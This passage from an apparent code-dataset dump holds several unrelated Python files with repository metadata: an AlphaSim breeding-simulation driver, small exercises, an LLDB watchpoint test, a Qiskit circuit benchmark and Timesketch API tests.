    ped.write_ped("/home/jana/bin/AlphaSim1.05Linux/ExternalPedigree.txt")
    return ped, ped.save_cat(), ped.save_sex(), ped.save_active()
###########################################################################
########################################################################
#ped = pedigree("~/Documents/PhD/Simulaton/Pedigrees/PedPython.txt")
#TUKAJ PA JE SEDAJ PROGRAM
#Najprej določi, ali štartaš od začetka in počasi polniš populacijo ali štartaš z polnim pedigrejem
# Interactive run configuration.  Note: raw_input() returns a string.
# "1" - fill the population gradually; "2" - start from a full pedigree.
OPTION = raw_input("1 - Polnjenje populacije; 2 - Start z polnim pedigrejem ")
#PedFile = raw_input("Vnesi pot do pedigreja")
StBurnInGen = input("Vnesi stevilo burn in generacij: ")  # number of burn-in generations
StSelGen = input("Vnesi stevilo krogov oz. generacij: ")  # number of selection rounds/generations
AlphaSimDir = '/home/jana/bin/AlphaSim1.05Linux'
# NOTE(review): the prompted value below is immediately overwritten twice, so
# the user's answer is discarded and the last hard-coded AlphaSim path always
# wins -- confirm which path is intended.
AlphaSimPed = raw_input("Vnesi pot do output AlphaSim pedigrejev im ime file")
AlphaSimPed = "/home/jana/Documents/PhD/Simulaton/Pedigrees/Pedigree_10burnIn_10gen.txt"
AlphaSimPed = '/home/jana/bin/AlphaSim1.05Linux/SimulatedData/PedigreeAndGeneticValues.txt'
"""
if OPTION == 1:
for krog in StKrogov:
#PRERAČUNAŠ EBV v Ru in ZAPIŠEŠ PEDIGRE
shutil.copy ("Rcorr_PedEBV.R", "Rcorr_PedEBV_ThisGen.R")
os.system('sed -i "s|AlphaSimPed|' + AlphaSimPed + '|g" Rcorr_PedEBV_ThisGen.R')
call('Rscript Rcorr_PedEBV_ThisGen.R', shell=True)
selekcija_ena_gen('GenPed_EBV.txt') #to ti določi kategorije in starše
#prestavi se v AlphaSim Dir
os.chdir(AlphaSimDir)
#TUKAJ POTEM POPRAVIŠ AlphaSimSpec
#tukaj poženeš prvič po burn inu
os.system('sed -i "s|StartStopGeneration ,1,' + str(StBurnInGen) + '|StartStopGeneration ,' + str(StBurnInGen+1) + ',' + str(StBurnInGen+1) + '|g" Rcorr_PedEBV_ThisGen.R')
os.system('sed -i "s|Internal|ExternalPedigree_NextGen.txt|g" AlphaSimSpec.txt')
#POŽENEŠ ALPHASIM
os.system('./AlphaSim1.05')
"""
def _recompute_ebv():
    """Re-estimate breeding values in R and write the pedigree used for selection."""
    os.chdir('/home/jana/Genotipi/Genotipi_CODES/')
    # Parameterise a fresh copy of the R script with the current AlphaSim pedigree path.
    shutil.copy ("Rcorr_PedEBV.R", "Rcorr_PedEBV_ThisGen.R")
    os.system('sed -i "s|AlphaSimPed|' + AlphaSimPed + '|g" Rcorr_PedEBV_ThisGen.R')
    call('Rscript Rcorr_PedEBV_ThisGen.R', shell=True)


def _run_selection_round(roundNo):
    """Fill in AlphaSimSpec.txt for selection round *roundNo* (external
    pedigree, flexible generation = StBurnInGen + roundNo) and run AlphaSim.
    Must be called with the AlphaSim directory as the cwd.
    """
    shutil.copy('/home/jana/Genotipi/Genotipi_CODES/AlphaSimSpec.txt', AlphaSimDir)
    os.system('sed -i "s|PedigreeType|ExternalPedigree.txt|g" AlphaSimSpec.txt')
    os.system('sed -i "s|EnterBurnInGenerationNumber|' + str(StBurnInGen) + '|g" AlphaSimSpec.txt')
    os.system('sed -i "s|EnterSelectionGenerationNumber|' + str(StSelGen) + '|g" AlphaSimSpec.txt')
    os.system('sed -i "s|EnterNumberOfSires|0|g" AlphaSimSpec.txt')
    os.system('sed -i "s|EnterNumberOfDams|0|g" AlphaSimSpec.txt')
    os.system('sed -i "s|TurnOnGenFlex|On|g" AlphaSimSpec.txt')
    os.system('sed -i "s|StartFlexGen,StopFlexGen|' + str(StBurnInGen + roundNo) + ',' + str(StBurnInGen + roundNo) + '|g" AlphaSimSpec.txt')
    os.system('sed -i "s|TurnOnSelFlex|On|g" AlphaSimSpec.txt')
    os.system('sed -i "s|TheImportedGenerationPed|' + str(StBurnInGen + roundNo) + '|g" AlphaSimSpec.txt')
    os.system('sed -i "s|TBVComputation|2|g" AlphaSimSpec.txt')
    os.system('sed -i "s|EnterIndividualInPopulation|' + str(stNB) + '|g" AlphaSimSpec.txt')
    # run AlphaSim
    os.system('./AlphaSim1.05')


# BUG FIX: raw_input() returns a string, so the original `OPTION == 2`
# (comparison against the int 2) was never true and this whole branch
# was unreachable dead code.
if OPTION == "2":
    BurnInYN = raw_input("Do you already have a burn in population? [Y/N] ")
    if BurnInYN == 'N':
        for roundNo in range(StSelGen+1):
            if roundNo == 0:
                # Burn-in round: internal pedigree simulated by AlphaSim itself.
                os.chdir(AlphaSimDir)
                shutil.copy('/home/jana/Genotipi/Genotipi_CODES/AlphaSimSpec.txt', AlphaSimDir)
                os.system('sed -i "s|PedigreeType|Internal|g" AlphaSimSpec.txt')
                os.system('sed -i "s|EnterBurnInGenerationNumber|' + str(StBurnInGen) + '|g" AlphaSimSpec.txt')
                os.system('sed -i "s|EnterSelectionGenerationNumber|' + str(StSelGen) + '|g" AlphaSimSpec.txt')
                # NOTE(review): NumberOfSires / NumberOfDams are not defined
                # anywhere in this file -- this branch raises NameError as
                # written; confirm the intended values before using it.
                os.system('sed -i "s|EnterNumberOfSires|' + str(NumberOfSires) + '|g" AlphaSimSpec.txt')
                os.system('sed -i "s|EnterNumberOfDams|' + str(NumberOfDams) + '|g" AlphaSimSpec.txt')
                os.system('sed -i "s|TurnOnGenFlex|On|g" AlphaSimSpec.txt')
                os.system('sed -i "s|StartFlexGen,StopFlexGen|1,' + str(StBurnInGen + 1) + '|g" AlphaSimSpec.txt')
                os.system('sed -i "s|TurnOnSelFlex|On|g" AlphaSimSpec.txt')
                os.system('sed -i "s|TheImportedGenerationPed|' + str(StBurnInGen + 1) + '|g" AlphaSimSpec.txt')
                os.system('sed -i "s|TBVComputation|1|g" AlphaSimSpec.txt')
                os.system('sed -i "s|EnterIndividualInPopulation|' + str(stNB) + '|g" AlphaSimSpec.txt')
                # run AlphaSim
                os.system('./AlphaSim1.05')
            else:
                _recompute_ebv()
                # Round 1 initialises categories from the full pedigree;
                # later rounds advance the existing population one generation.
                if roundNo == 1:
                    ped, categories, sex, active = nastavi_cat('GenPed_EBV.txt')
                else:
                    ped, categories, sex, active = selekcija_ena_gen('GenPed_EBV.txt')
                os.chdir(AlphaSimDir)
                # archive this round's external pedigree
                shutil.copy('ExternalPedigree.txt', AlphaSimDir + '/Selection/SelectionFolder' + str(roundNo) + '/')
                _run_selection_round(roundNo)
    if BurnInYN == 'Y':
        # Resume on an existing burn-in population, starting at round 6.
        # (The original also carried a `roundNo == 1` branch here; it was
        # unreachable because the range starts at 6, so it has been dropped.)
        for roundNo in range(6, (StSelGen+1)):
            _recompute_ebv()
            # NOTE(review): on the first pass `categories`/`sex`/`active` have
            # not been initialised anywhere in this branch -- presumably they
            # are meant to be restored from a previous run; confirm.
            ped, categories, sex, active = selekcija_ena_gen('GenPed_EBV.txt', categories=categories, sex=sex, active=active)
            os.chdir(AlphaSimDir)
            os.system('mkdir ' + AlphaSimDir + '/Selection/SelectionFolder' + str(roundNo))
            shutil.copy('ExternalPedigree.txt', AlphaSimDir + '/Selection/SelectionFolder' + str(roundNo) + '/')
            _run_selection_round(roundNo)
###################################################################################################
###################################################################################################
###################################################################################################
###################################################################################################
#plot the results
#class TBVGenTable (SelectionTbvTest.txt)
from scipy import stats
import matplotlib.pyplot as plt

# BUG FIX: the original called TBVmeans.clear() before TBVmeans existed
# (NameError on a fresh run); simply create the dict first.
TBVmeans = defaultdict(list)
# NOTE(review): 'rounds' is not defined anywhere in this file -- presumably
# it should be StSelGen; confirm before running this section.
for roundNo in range(1, rounds+1):
    TBVt = TBVGenTable(AlphaSimDir + '/Selection/SelectionFolder' + str(roundNo) + '/SelectionTbvTest.txt')
    TBVmeans[roundNo] = TBVt.TBVmean

TBV = TBVPed(AlphaSimDir)
# per-generation mean and variance of true breeding values, genomic scenario
gens, means, variances = TBV.genTrend(AlphaSimDir + '/Gen/SimulatedData/PedigreeAndGeneticValues.txt')
# BUG FIX: the classical-scenario path was missing the leading '/'
# (it concatenated to ".../AlphaSim1.05LinuxClass/...").
gensC, meansC, varsC = TBV.genTrend(AlphaSimDir + '/Class/SimulatedData/PedigreeAndGeneticValues.txt')

#plt.errorbar(x = TBV.gens, y = TBV.means, yerr = TBV.vars)
plt.plot(gens, means, label = 'Mean Gen TBV, gen')
plt.xlabel('Selected Generation')
plt.ylabel('Mean Generation TBV')
plt.legend(loc='upper left')  # BUG FIX: 'pylab' was never imported; use plt
plt.show()

plt.plot(gensC, meansC, label = 'Mean Gen TBV, class')
plt.xlabel('Selected Generation')
plt.ylabel('Mean Generation TBV')
plt.legend(loc='upper left')
plt.show()

plt.plot(gens, variances, label = 'TBV Var gen')
plt.legend(loc='upper left')
plt.xlabel('Selected Generation')
plt.ylabel('Generation TBV variance')
plt.show()

plt.plot(gensC, varsC, label = 'TBV Var class')
plt.legend(loc='upper left')
plt.xlabel('Selected Generation')
plt.ylabel('Generation TBV variance')
plt.show()
| [
"obsteter.jana@gmail.com"
] | obsteter.jana@gmail.com |
08b77271f6d9e743446b11420b21694f8c5cb7a8 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02767/s509630790.py | 134d80c81b5f5cf92ccd09bce8a4d9e1b91e7af6 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 165 | py | N = int(input())
X_list = list(map(int, input().split()))
X_mean = round(sum(X_list) / N)
physical_sum = sum([(i - X_mean)**2 for i in X_list])
print(physical_sum) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
65e4cf82411c8c8153f0661d7ec0d14d2b426b00 | b29acb2e230b3cf2f8be070850c34ed5d62dc80c | /Python/YPS/Rensyu/08/Sample1.py | e365d37f505389fb63bb58af6d100aea58fe1491 | [] | no_license | MasatakaShibataSS/lesson | be6e3557c52c6157b303be268822cad613a7e0f7 | 4f3f81ba0161b820410e2a481b63a999d0d4338c | refs/heads/master | 2020-06-17T13:42:08.383167 | 2019-11-11T07:23:14 | 2019-11-11T07:23:14 | 195,940,605 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 471 | py | class Car():
    def __init__(self, num, gas):
        """Store the registration number *num* and fuel amount *gas*."""
        self.num = num
        self.gas = gas
    def getNumber(self):
        """Return the car's registration number."""
        return self.num
    def getGas(self):
        """Return the car's fuel amount."""
        return self.gas
# Create two cars and report each one's number and fuel amount.
for car in (Car(1234, 25.5), Car(2345, 30.5)):
    print("ナンバーは", car.getNumber(), "ガソリン量は", car.getGas(), "です。")
| [
"masataka.shibata.ss@gmail.com"
] | masataka.shibata.ss@gmail.com |
7078dcee082ede20fd630e1599955619f9c49a3f | 9c006bd8b1f628200a63a194000836505f50be9b | /tools/lldb/test/functionalities/watchpoint/watchpoint_commands/command/TestWatchpointCommandLLDB.py | d2ba2ae6056b494007615c201f3531a9de244e39 | [
"NCSA"
] | permissive | hoangt/NyuziToolchain | a66989a1b9c71a2df782f9c573b0da62d1e0e9cf | 400aae2a01d38a1e836d7be33211aa8525c87070 | refs/heads/master | 2020-12-24T23:29:11.747602 | 2015-08-30T00:06:09 | 2015-08-30T00:06:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,631 | py | """
Test 'watchpoint command'.
"""
import os, time
import unittest2
import lldb
from lldbtest import *
import lldbutil
class WatchpointLLDBCommandTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
    def setUp(self):
        """Cache source locations and a unique per-test executable name."""
        # Call super's setUp().
        TestBase.setUp(self)
        # Our simple source filename.
        self.source = 'main.cpp'
        # Find the line number to break inside main().
        self.line = line_number(self.source, '// Set break point at this line.')
        # And the watchpoint variable declaration line number.
        self.decl = line_number(self.source, '// Watchpoint variable declaration.')
        # Build dictionary to have unique executable names for each test method.
        self.exe_name = 'a%d.out' % self.test_number
        self.d = {'CXX_SOURCES': self.source, 'EXE': self.exe_name}
    @skipUnlessDarwin
    @dsym_test
    def test_watchpoint_command_with_dsym(self):
        """Test 'watchpoint command' (dSYM debug-info variant)."""
        self.buildDsym(dictionary=self.d)
        # Clean up the uniquely named binary after this test method.
        self.setTearDownCleanup(dictionary=self.d)
        self.watchpoint_command()
    @dwarf_test
    @expectedFailureAndroid(archs=['arm', 'aarch64']) # Watchpoints not supported
    def test_watchpoint_command_with_dwarf(self):
        """Test 'watchpoint command' (DWARF debug-info variant)."""
        self.buildDwarf(dictionary=self.d)
        # Clean up the uniquely named binary after this test method.
        self.setTearDownCleanup(dictionary=self.d)
        self.watchpoint_command()
    @skipUnlessDarwin
    @dsym_test
    def test_watchpoint_command_can_disable_a_watchpoint_with_dsym(self):
        """Test that 'watchpoint command' action can disable a watchpoint after it is triggered (dSYM variant)."""
        self.buildDsym(dictionary=self.d)
        # Clean up the uniquely named binary after this test method.
        self.setTearDownCleanup(dictionary=self.d)
        self.watchpoint_command_can_disable_a_watchpoint()
    @dwarf_test
    @expectedFailureAndroid(archs=['arm', 'aarch64']) # Watchpoints not supported
    def test_watchpoint_command_can_disable_a_watchpoint_with_dwarf(self):
        """Test that 'watchpoint command' action can disable a watchpoint after it is triggered (DWARF variant)."""
        self.buildDwarf(dictionary=self.d)
        # Clean up the uniquely named binary after this test method.
        self.setTearDownCleanup(dictionary=self.d)
        self.watchpoint_command_can_disable_a_watchpoint()
def watchpoint_command(self):
"""Do 'watchpoint command add'."""
exe = os.path.join(os.getcwd(), self.exe_name)
self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET)
# Add a breakpoint to set a watchpoint when stopped on the breakpoint.
lldbutil.run_break_set_by_file_and_line (self, None, self.line, num_expected_locations=1)
# Run the program.
self.runCmd("run", RUN_SUCCEEDED)
# We should be stopped again due to the breakpoint.
# The stop reason of the thread should be breakpoint.
self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT,
substrs = ['stopped',
'stop reason = breakpoint'])
# Now let's set a write-type watchpoint for 'global'.
self.expect("watchpoint set variable -w write global", WATCHPOINT_CREATED,
substrs = ['Watchpoint created', 'size = 4', 'type = w',
'%s:%d' % (self.source, self.decl)])
self.runCmd('watchpoint command add 1 -o "expr -- cookie = 777"')
# List the watchpoint command we just added.
self.expect("watchpoint command list 1",
substrs = ['expr -- cookie = 777'])
# Use the '-v' option to do verbose listing of the watchpoint.
# The hit count should be 0 initially.
self.expect("watchpoint list -v",
substrs = ['hit_count = 0'])
self.runCmd("process continue")
# We should be stopped again due to the watchpoint (write type).
# The stop reason of the thread should be watchpoint.
self.expect("thread backtrace", STOPPED_DUE_TO_WATCHPOINT,
substrs = ['stop reason = watchpoint'])
# Check that the watchpoint snapshoting mechanism is working.
self.expect("watchpoint list -v",
substrs = ['old value:', ' = 0',
'new value:', ' = 1'])
# The watchpoint command "forced" our global variable 'cookie' to become 777.
self.expect("frame variable --show-globals cookie",
substrs = ['(int32_t)', 'cookie = 777'])
def watchpoint_command_can_disable_a_watchpoint(self):
"""Test that 'watchpoint command' action can disable a watchpoint after it is triggered."""
exe = os.path.join(os.getcwd(), self.exe_name)
self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET)
# Add a breakpoint to set a watchpoint when stopped on the breakpoint.
lldbutil.run_break_set_by_file_and_line (self, None, self.line, num_expected_locations=1)
# Run the program.
self.runCmd("run", RUN_SUCCEEDED)
# We should be stopped again due to the breakpoint.
# The stop reason of the thread should be breakpoint.
self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT,
substrs = ['stopped',
'stop reason = breakpoint'])
# Now let's set a write-type watchpoint for 'global'.
self.expect("watchpoint set variable -w write global", WATCHPOINT_CREATED,
substrs = ['Watchpoint created', 'size = 4', 'type = w',
'%s:%d' % (self.source, self.decl)])
self.runCmd('watchpoint command add 1 -o "watchpoint disable 1"')
# List the watchpoint command we just added.
self.expect("watchpoint command list 1",
substrs = ['watchpoint disable 1'])
# Use the '-v' option to do verbose listing of the watchpoint.
# The hit count should be 0 initially.
self.expect("watchpoint list -v",
substrs = ['hit_count = 0'])
self.runCmd("process continue")
# We should be stopped again due to the watchpoint (write type).
# The stop reason of the thread should be watchpoint.
self.expect("thread backtrace", STOPPED_DUE_TO_WATCHPOINT,
substrs = ['stop reason = watchpoint'])
# Check that the watchpoint has been disabled.
self.expect("watchpoint list -v",
substrs = ['disabled'])
self.runCmd("process continue")
# There should be no more watchpoint hit and the process status should
# be 'exited'.
self.expect("process status",
substrs = ['exited'])
if __name__ == '__main__':
    import atexit
    # Initialize the LLDB debugger once for this test process and guarantee
    # it is torn down at interpreter exit, then hand off to the test runner.
    lldb.SBDebugger.Initialize()
    atexit.register(lambda: lldb.SBDebugger.Terminate())
    unittest2.main()
| [
"jeffbush001@gmail.com"
] | jeffbush001@gmail.com |
7cf33ffd307ec8485e367021e0c782dd7af726bb | 27a580304382e3a79c7307f42a83b689566dbf30 | /reinforcement_learning/0x03-policy_gradients/policy_gradient.py | dff87a11d16bf082c2455db22eacbd163879aa68 | [] | no_license | salmenz/holbertonschool-machine_learning | a37712a125cd2e9e4bd6975c3bb2338f3533474f | a49eb348ff994f35b0efbbd5ac3ac8ae8ccb57d2 | refs/heads/master | 2023-07-11T06:00:36.162782 | 2021-08-11T17:45:35 | 2021-08-11T17:45:35 | 279,366,817 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 662 | py | #!/usr/bin/env python3
"""policy gradient"""
import numpy as np
def policy(matrix, weight):
    """Return softmax action probabilities for the given state.

    Args:
        matrix: 2-D numpy array of shape (1, n) holding the state features.
        weight: numpy array of shape (n, m) mapping features to action scores.

    Returns:
        numpy array of shape (1, m) of probabilities summing to 1.
    """
    z = matrix.dot(weight)
    # Subtract the max score before exponentiating for numerical stability;
    # softmax is invariant under a constant shift of its inputs, so the
    # result is unchanged but large scores no longer overflow np.exp.
    exp = np.exp(z - np.max(z))
    return exp / np.sum(exp)
def softmax_grad(softmax):
    """Return the Jacobian of the softmax: diag(p) - p p^T.

    Args:
        softmax: array of probabilities (any shape; flattened to length m).

    Returns:
        (m, m) numpy array J with J[i, j] = p[i]*(delta_ij - p[j]).
    """
    probs = np.ravel(softmax)
    return np.diag(probs) - np.outer(probs, probs)
def policy_gradient(state, weight):
    """Compute the policy gradient for the highest-probability action.

    Args:
        state: 2-D numpy array of shape (1, n) holding the state features.
        weight: numpy array of shape (n, m) of policy parameters.

    Returns:
        Tuple (action, gradient) where `action` is the argmax action index
        and `gradient` is the gradient of log pi(action|state) w.r.t. weight.
    """
    # Evaluate the policy once and reuse it; the original recomputed the
    # same softmax three times.
    probs = policy(state, weight)
    action = np.argmax(probs)
    # Row of the softmax Jacobian for the chosen action.
    dsoftmax = softmax_grad(probs)[action, :]
    # d log(p_action) / d z = (d p_action / d z) / p_action.
    dlog = dsoftmax / probs[0, action]
    gradient = state.T.dot(dlog[None, :])
    return (action, gradient)
| [
"salmen.zooro@gmail.com"
] | salmen.zooro@gmail.com |
78c81bf41eaa5f3d6619327d769a73f98ac9db0b | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /benchmark/startQiskit1616.py | 5f4d304cc7b1179048c26042ec6efbd6cdbd56f6 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,491 | py | # qubit number=5
# total number=60
import cirq
import qiskit
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2,floor, sqrt, pi
import numpy as np
import networkx as nx
def build_oracle(n: int, f) -> QuantumCircuit:
    """Build the phase oracle Zf (O_f^±) for a boolean function f on n bits.

    For every basis state whose bit string maps to "1" under f, the oracle
    flips the phase of that state and leaves all others untouched.

    Args:
        n: number of qubits (= length of the input bit strings).
        f: callable taking an n-character bit string and returning "0" or "1".

    Returns:
        A QuantumCircuit named "Zf" acting on an n-qubit register.
    """
    # implement the oracle O_f^\pm
    # NOTE: use U1 gate (P gate) with \lambda = 180 ==> CZ gate
    # or multi_control_Z_gate (issue #127)
    controls = QuantumRegister(n, "ofc")
    oracle = QuantumCircuit(controls, name="Zf")

    for i in range(2 ** n):
        rep = np.binary_repr(i, n)
        if f(rep) == "1":
            # Map this marked basis state onto |11...1> by X-ing its 0 bits...
            for j in range(n):
                if rep[j] == "0":
                    oracle.x(controls[j])
            # oracle.h(controls[n])
            if n >= 2:
                # ...apply a multi-controlled phase of pi (multi-controlled Z)...
                oracle.mcu1(pi, controls[1:], controls[0])
            # ...then undo the X gates to restore the computational basis.
            for j in range(n):
                if rep[j] == "0":
                    oracle.x(controls[j])
    # oracle.barrier()
    return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
    """Build a (mutated) Grover-style search circuit over n qubits.

    The gate sequence is auto-generated (the trailing `# number=` tags are
    mutation-tracking ids from the generator) around the standard Grover
    skeleton: state preparation, floor(sqrt(2^n)*pi/4) iterations of the
    Zf oracle plus diffusion-like gates, then measurement of every qubit.

    Args:
        n: number of data qubits.
        f: boolean function passed to build_oracle to mark the target state.

    Returns:
        A QuantumCircuit with n classical bits holding the measurements.
    """
    # circuit begin
    input_qubit = QuantumRegister(n,"qc")
    classical = ClassicalRegister(n, "qm")
    prog = QuantumCircuit(input_qubit, classical)
    prog.h(input_qubit[0]) # number=3
    prog.h(input_qubit[1]) # number=4
    prog.h(input_qubit[2]) # number=5
    prog.h(input_qubit[3]) # number=6
    prog.h(input_qubit[0]) # number=38
    prog.cz(input_qubit[1],input_qubit[0]) # number=39
    prog.h(input_qubit[0]) # number=40
    prog.h(input_qubit[0]) # number=49
    prog.cz(input_qubit[1],input_qubit[0]) # number=50
    prog.h(input_qubit[0]) # number=51
    prog.cx(input_qubit[1],input_qubit[0]) # number=52
    prog.z(input_qubit[1]) # number=53
    prog.h(input_qubit[0]) # number=57
    prog.cz(input_qubit[1],input_qubit[0]) # number=58
    prog.h(input_qubit[0]) # number=59
    prog.cx(input_qubit[1],input_qubit[0]) # number=47
    prog.h(input_qubit[0]) # number=32
    prog.cz(input_qubit[1],input_qubit[0]) # number=33
    prog.h(input_qubit[0]) # number=34
    prog.x(input_qubit[4]) # number=48
    prog.h(input_qubit[4]) # number=21
    Zf = build_oracle(n, f)

    # Optimal number of Grover iterations for a single marked state.
    repeat = floor(sqrt(2 ** n) * pi / 4)
    for i in range(repeat):
        prog.append(Zf.to_gate(), [input_qubit[i] for i in range(n)])
        prog.h(input_qubit[0]) # number=1
        prog.h(input_qubit[1]) # number=2
        prog.h(input_qubit[2]) # number=7
        prog.h(input_qubit[3]) # number=8
        prog.cx(input_qubit[3],input_qubit[0]) # number=41
        prog.z(input_qubit[3]) # number=42
        prog.cx(input_qubit[3],input_qubit[0]) # number=43
        prog.cx(input_qubit[1],input_qubit[3]) # number=44
        prog.x(input_qubit[0]) # number=9
        prog.h(input_qubit[1]) # number=56
        prog.x(input_qubit[1]) # number=10
        prog.x(input_qubit[2]) # number=11
        prog.rx(-2.9845130209103035,input_qubit[4]) # number=55
        prog.cx(input_qubit[0],input_qubit[3]) # number=35
        prog.x(input_qubit[3]) # number=36
        prog.cx(input_qubit[0],input_qubit[3]) # number=37
        if n>=2:
            prog.mcu1(pi,input_qubit[1:],input_qubit[0])

        prog.cx(input_qubit[1],input_qubit[0]) # number=24
        prog.x(input_qubit[0]) # number=25
        prog.cx(input_qubit[1],input_qubit[0]) # number=26
        prog.x(input_qubit[1]) # number=14
        prog.x(input_qubit[2]) # number=15
        prog.x(input_qubit[3]) # number=16
        prog.h(input_qubit[0]) # number=17
        prog.h(input_qubit[1]) # number=18
        prog.h(input_qubit[2]) # number=19
        prog.h(input_qubit[3]) # number=20
        prog.x(input_qubit[1]) # number=22
        prog.x(input_qubit[1]) # number=23
    # circuit end

    for i in range(n):
        prog.measure(input_qubit[i], classical[i])

    return prog
if __name__ == '__main__':
    # Search for the all-zeros bit string: f(rep) is "1" only when rep == key.
    key = "00000"
    f = lambda rep: str(int(rep == key))
    prog = make_circuit(5,f)
    # Simulate measurement counts on the ideal QASM simulator.
    backend = BasicAer.get_backend('qasm_simulator')
    sample_shot =7924
    info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
    # Transpile against a mocked real device to record post-optimization depth.
    backend = FakeVigo()
    circuit1 = transpile(prog,backend,optimization_level=2)

    # Dump counts, a sentinel line, the transpiled depth, and the circuit text.
    writefile = open("../data/startQiskit1616.csv","w")
    print(info,file=writefile)
    print("results end", file=writefile)
    print(circuit1.depth(),file=writefile)
    print(circuit1,file=writefile)
    writefile.close()
"wangjiyuan123@yeah.net"
] | wangjiyuan123@yeah.net |
016174c973cc6d5cc9d0073c0db0aed68af4d195 | 75d54a70d42f3790e917569172cde9b6969468cb | /timesketch/api/v1/resources_test.py | 13bf2ad68618a276a6b564f944363ea42a521818 | [
"Apache-2.0"
] | permissive | MarVinPL/timesketch | 792be04b8c9b1cab50bb6b5bf0096498bbc71b5b | 3c63cacef0f4ed4bbe826903ee5d708cc0502bb3 | refs/heads/master | 2021-01-15T20:33:36.816774 | 2015-03-26T08:53:27 | 2015-03-26T08:53:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,786 | py | # Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for v1 of the Timesketch API."""
import mock
import json
from timesketch.lib.definitions import HTTP_STATUS_CODE_CREATED
from timesketch.lib.definitions import HTTP_STATUS_CODE_BAD_REQUEST
from timesketch.lib.testlib import BaseTest
from timesketch.lib.testlib import MockDataStore
class SketchListResourceTest(BaseTest):
    """Test SketchListResource."""
    # REST endpoint under test.
    resource_url = '/api/v1/sketches/'

    def test_sketch_list_resource(self):
        """Authenticated request to get list of sketches."""
        self.login()
        response = self.client.get(self.resource_url)
        # The fixture user can see exactly one sketch, named 'Test 1'.
        self.assertEqual(len(response.json['objects']), 1)
        self.assertEqual(
            response.json['objects'][0][0]['name'], 'Test 1')
        self.assert200(response)
class SketchResourceTest(BaseTest):
    """Test SketchResource."""
    # REST endpoint under test (sketch id 1 belongs to the fixture user).
    resource_url = '/api/v1/sketches/1/'

    def test_sketch_resource(self):
        """Authenticated request to get a sketch."""
        self.login()
        response = self.client.get(self.resource_url)
        self.assertEqual(len(response.json['objects']), 1)
        self.assertEqual(len(response.json['objects'][0]['timelines']), 1)
        self.assertEqual(response.json['objects'][0]['name'], 'Test 1')
        self.assert200(response)

    def test_sketch_acl(self):
        """
        Authenticated request to get a sketch that the user do not have read
        permission on.
        """
        self.login()
        # Sketch 2 belongs to another user, so access must be forbidden.
        response = self.client.get('/api/v1/sketches/2/')
        self.assert403(response)
class ViewListResourceTest(BaseTest):
    """Test ViewListResource."""
    # REST endpoint under test.
    resource_url = '/api/v1/sketches/1/views/'

    def test_post_view_resource(self):
        """Authenticated request to create a view."""
        self.login()
        data = dict(name='test', query='test', filter='{}')
        response = self.client.post(
            self.resource_url, data=json.dumps(data),
            content_type='application/json')
        # A successful creation must answer 201 CREATED.
        self.assertEquals(response.status_code, HTTP_STATUS_CODE_CREATED)
class ViewResourceTest(BaseTest):
    """Test ViewResource."""
    # REST endpoint under test (view 1 belongs to the fixture user).
    resource_url = '/api/v1/sketches/1/views/1/'

    def test_view_resource(self):
        """Authenticated request to get a view."""
        self.login()
        response = self.client.get(self.resource_url)
        self.assertEqual(len(response.json['objects']), 1)
        self.assertEqual(response.json['objects'][0]['name'], 'View 1')
        self.assert200(response)

    def test_invalid_user_in_view(self):
        """Authenticated request to get a view for another user."""
        self.login()
        # View 3 is owned by a different user; expect 403 FORBIDDEN.
        response = self.client.get('/api/v1/sketches/1/views/3/')
        self.assert403(response)

    def test_invalid_view(self):
        """Authenticated request to get a view for non existing view."""
        self.login()
        # View 2 does not exist; expect 404 NOT FOUND.
        response = self.client.get('/api/v1/sketches/1/views/2/')
        self.assert404(response)
class ExploreResourceTest(BaseTest):
    """Test ExploreResource."""
    # REST endpoint under test.
    resource_url = '/api/v1/sketches/1/explore/'

    # Canned payload the mocked datastore is expected to return for the
    # query below; compared verbatim against the API response.
    expected_response = {
        u'meta': {
            u'timeline_names': {
                u'test': u'Timeline 1'
            },
            u'timeline_colors': {
                u'test': u'FFFFFF'
            },
            u'es_total_count': 1,
            u'es_time': 5
        },
        u'objects': [
            {
                u'sort': [
                    1410593223000
                ],
                u'_type': u'plaso_event',
                u'_source': {
                    u'timestamp': 1410593222543942,
                    u'message': u'Test event',
                    u'label': [
                        u'__ts_star'
                    ],
                    u'timestamp_desc': u'Content Modification Time',
                    u'datetime': u'2014-09-13T07:27:03+00:00'
                },
                u'_score': u'null',
                u'_index': u'test',
                u'_id': u'test'
            }
        ]
    }

    @mock.patch(
        'timesketch.api.v1.resources.ElasticSearchDataStore', MockDataStore)
    def test_search(self):
